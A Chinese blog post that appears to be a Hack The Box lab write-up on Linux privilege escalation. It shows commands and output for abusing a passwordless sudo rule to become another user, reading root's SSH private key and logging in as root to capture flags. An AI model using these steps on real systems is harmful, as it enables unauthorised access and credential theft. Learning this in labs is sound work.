HgTrojan blog日常一练(权限提升)
题目
解答
问题1:
ssh连接到机器
┌──(root㉿HgTrojan)-[~]
└─# ssh [email protected] -p 58664
([email protected]) Password:
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.10.0-18-amd64 x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
This system has been minimized by removing packages and content that are
not required on a system that users do not log into.
To restore this content, you can run the 'unminimize' command.
Last login: Wed Jan 17 12:24:14 2024 from 10.30.12.112
user1@ng-1058343-gettingstartedprivesc-bccsa-55456dcb9d-dwmvc:~$
使用'sudo -l'命令检查我们拥有哪些权限
user1@ng-1058343-gettingstartedprivesc-bccsa-55456dcb9d-dwmvc:~$ sudo -l
Matching Defaults entries for user1 on ng-1058343-gettingstartedprivesc-bccsa-55456dcb9d-dwmvc:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User user1 may run the following commands on ng-1058343-gettingstartedprivesc-bccsa-55456dcb9d-dwmvc:
(user2 : user2) NOPASSWD: /bin/bash
user1@ng-1058343-gettingstartedprivesc-bccsa-55456dcb9d-dwmvc:~$
根据sudo -l的输出,用户 user1 在主机 ng-1058343-gettingstartedprivesc-bccsa-55456dcb9d-dwmvc 上有特定的 sudo 权限。用户 user1 可以以 user2 的身份(在主机上)执行 /bin/bash 命令,并且不需要密码。
所以可以构建POC:
user1@ng-1058343-gettingstartedprivesc-bccsa-55456dcb9d-dwmvc:~$ sudo -u user2 /bin/bash
user2@ng-1058343-gettingstartedprivesc-bccsa-55456dcb9d-dwmvc:/home/user1$ ls
shell.sh
user2@ng-1058343-gettingstartedprivesc-bccsa-55456dcb9d-dwmvc:/home/user1$ sudo -u user2 /bin/bash
user2 is not in the sudoers file. This incident will be reported.
user2@ng-1058343-gettingstartedprivesc-bccsa-55456dcb9d-dwmvc:/home/user1$ cat /home/user2/flag.txt
HTB{l473r4l_m0v3m3n7_70_4n07h3r_u53r}
user2@ng-1058343-gettingstartedprivesc-bccsa-55456dcb9d-dwmvc:/home/user1$
问题2
在第一题获取到user2访问权限的基础上,我发现user2可以vim查看root的/root/.ssh/id_rsa
┌──(root㉿HgTrojan)-[~]
└─# ssh [email protected] -p 36638
([email protected]) Password:
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.10.0-18-amd64 x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
This system has been minimized by removing packages and content that are
not required on a system that users do not log into.
To restore this content, you can run the 'unminimize' command.
Last login: Wed Jan 17 13:57:55 2024 from 10.30.12.117
user1@ng-1058343-gettingstartedprivesc-djngm-74fdd4df9c-vlrkf:~$ sudo -u user2 /bin/bash
user2@ng-1058343-gettingstartedprivesc-djngm-74fdd4df9c-vlrkf:/home/user1$ cd /root/.ssh
user2@ng-1058343-gettingstartedprivesc-djngm-74fdd4df9c-vlrkf:/root/.ssh$ ls
authorized_keys id_rsa id_rsa.pub
user2@ng-1058343-gettingstartedprivesc-djngm-74fdd4df9c-vlrkf:/root/.ssh$ vim id_rsa
此时我们copy密钥内容,到本机id_rsa文件,同时修改该文件权限,因为(Permissions 0644 for 'id_res' are too open.
)ssh对于密钥文件的隐私性是有要求的,完成这些后我们就可以获取root权限进行夺旗了。
┌──(root㉿HgTrojan)-[~]
└─# vim id_rsa
┌──(root㉿HgTrojan)-[~]
└─# chmod 600 id_rsa
┌──(kali㉿HgTrojan)-[~/桌面]
└─$ ssh [email protected] -p 36638 -i id_res
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.10.0-18-amd64 x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
This system has been minimized by removing packages and content that are
not required on a system that users do not log into.
To restore this content, you can run the 'unminimize' command.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
root@ng-1058343-gettingstartedprivesc-djngm-74fdd4df9c-vlrkf:~# ls
flag.txt
root@ng-1058343-gettingstartedprivesc-djngm-74fdd4df9c-vlrkf:~# cat flag.txt
HTB{pr1v1l363_35c4l4710n_2_r007}
root@ng-1058343-gettingstartedprivesc-djngm-74fdd4df9c-vlrkf:~#
打赏: 
支付宝
本人所有文章均为技术分享,均用于防御为目的的记录,所有操作均在实验环境下进行,请勿用于其他用途,否则后果自负。 本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!
评论已关闭